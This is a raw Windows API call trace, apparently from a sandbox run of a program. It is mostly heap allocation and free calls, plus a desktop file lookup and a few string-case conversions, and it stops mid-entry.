[0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9888 [0122.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0122.919] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.919] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.920] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\gp1QElBYzj-bWq.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf40970, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0xc4b9db30, ftLastAccessTime.dwHighDateTime=0x1d5e432, ftLastWriteTime.dwLowDateTime=0xc4b9db30, ftLastWriteTime.dwHighDateTime=0x1d5e432, nFileSizeHigh=0x0, nFileSizeLow=0x5ad5, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="gp1QElBYzj-bWq.bmp", cAlternateFileName="GP1QEL~1.BMP")) returned 0x41ac500 [0122.920] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0122.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0122.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0122.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0122.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0122.920] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0122.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0122.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cf8 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0122.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0122.921] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0122.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0122.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0122.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0122.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0122.923] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0122.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0122.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0122.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bd8 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0122.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.925] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0122.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.929] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.930] 